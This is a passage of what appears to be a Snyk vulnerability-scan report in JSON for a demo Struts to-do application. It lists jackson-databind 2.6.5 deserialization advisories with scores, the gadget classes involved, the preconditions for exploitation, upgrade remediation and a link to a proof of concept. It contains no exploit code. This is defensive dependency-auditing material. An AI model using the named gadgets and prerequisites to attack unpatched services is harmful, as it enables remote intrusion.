deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.9.10.4 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/e2ba12d5d60715d95105e3e790fc234cfb59893d)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2670)\n- [PoC](https://github.com/Al1ex/CVE-2020-11113)\n", + "epssDetails": { + "percentile": "0.81603", + "probability": "0.00786", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-11113" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-9vvp-fxw6-jcxr" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2020-03-31T08:36:41.369827Z", + "functions_new": [ + { + "version": [ + "[2.0.0,2.9.10.4)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2020-03-31T06:16:36Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Proof of Concept", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2020-03-31T06:16:36Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:47.400473Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-561586", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,2.6.7.4)", + "[2.7.0,2.9.10.4)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "2.6.7.4", + "2.9.10.4" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.9.10.4)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/c14c9f99ed030dbd1440129585f03440c8758a99", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2664", + "title": "GitHub Issue" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.8, + "modificationTime": "2024-03-11T09:44:29.297635Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:51:14.145935Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:58:57.628835Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:44:29.297635Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:14.145935Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It mishandles the interaction between serialization gadgets and typing, related to gadgets `org.apache.activemq.*` (aka activemq-jms, activemq-core, activemq-pool, and activemq-pool-jms).\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.9.10.4 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/c14c9f99ed030dbd1440129585f03440c8758a99)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2664)\n", + "epssDetails": { + "percentile": "0.81603", + "probability": "0.00786", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-11111" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-v3xw-c963-f5hc" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2020-03-31T09:28:18.821103Z", + "functions_new": [ + { + "version": [ + "[,2.9.10.4)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2020-03-31T06:16:37Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2020-03-31T06:16:37Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:51:14.145935Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-561587", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,2.6.7.4)", + "[2.7.0,2.9.10.4)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "2.6.7.4", + "2.9.10.4" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.9.10.4)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/05d7e0e13f43e12db6a51726df12c8b4d8040676", + "title": "GItHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2666", + "title": "GitHub Issue" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.8, + "modificationTime": "2024-03-11T09:44:29.301384Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:51:14.113524Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:59:03.656527Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:44:29.301384Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:14.113524Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It mishandles the interaction between serialization gadgets and typing, related to gadget `org.apache.commons.proxy.provider.remoting.RmiProvider` (aka apache/commons-proxy).\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.9.10.4 or higher.\n## References\n- [GItHub Commit](https://github.com/FasterXML/jackson-databind/commit/05d7e0e13f43e12db6a51726df12c8b4d8040676)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2666)\n", + "epssDetails": { + "percentile": "0.81603", + "probability": "0.00786", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-11112" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-58pp-9c76-5625" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2020-03-31T09:29:29.728517Z", + "functions_new": [ + { + "version": [ + "[,2.9.10.4)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2020-03-31T06:16:37Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2020-03-31T06:16:37Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:51:14.113524Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-564887", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "credit": [ + "Tatu Saloranta" + ], + "semver": { + "vulnerable": [ + "[,2.6.7.4)", + "[2.7.0,2.9.10.4)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "2.6.7.4", + "2.9.10.4" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.9.10.4)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2682", + "title": "GitHub Issue" + }, + { + "url": "https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", + "title": "Medium Post" + } + ], + "cvssDetails": [ + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:49:54.679784Z" + }, + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:50:17.073265Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:58:57.162608Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:49:54.679784Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:50:17.073265Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It mishandles the interaction between serialization gadgets and typing, related to `org.apache.commons.jelly.impl.Embedded` (aka `commons-jelly`).\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.9.10.4 or higher.\n## References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2682)\n- [Medium Post](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n", + "epssDetails": { + "percentile": "0.92404", + "probability": "0.04399", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-11620" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-h4rc-386g-6m85" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2020-04-08T10:55:38.169333Z", + "functions_new": [ + { + "version": [ + "[,2.9.10.4)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2020-04-08T00:42:23Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2020-04-08T00:42:23Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:50:17.073265Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-564888", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "credit": [ + "Tatu Saloranta" + ], + "semver": { + "vulnerable": [ + "[,2.6.7.4)", + "[2.7.0,2.9.10.4)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "2.6.7.4", + "2.9.10.4" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[2.0.0,2.9.10.4)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2680", + "title": "GitHub Issues" + }, + { + "url": "https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", + "title": "Medium Post" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:50:17.355553Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:53:54.585105Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:55:38.933985Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:50:17.355553Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:54.585105Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It mishandles the interaction between serialization gadgets and typing, related to `org.springframework.aop.config.MethodLocatingFactoryBean` (aka `spring-aop`).\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.9.10.4 or higher.\n## References\n- [GitHub Issues](https://github.com/FasterXML/jackson-databind/issues/2680)\n- [Medium Post](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n", + "epssDetails": { + "percentile": "0.92902", + "probability": "0.05021", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-11619" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-27xj-rqx5-2255" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2020-04-08T10:59:04.995807Z", + "functions_new": [ + { + "version": [ + "[2.0.0,2.9.10.4)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2020-04-08T00:42:25Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2020-04-08T00:42:25Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:54.585105Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-570625", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "credit": [ + "XuYuanzhen" + ], + "semver": { + "vulnerable": [ + "[,2.6.7.4)", + 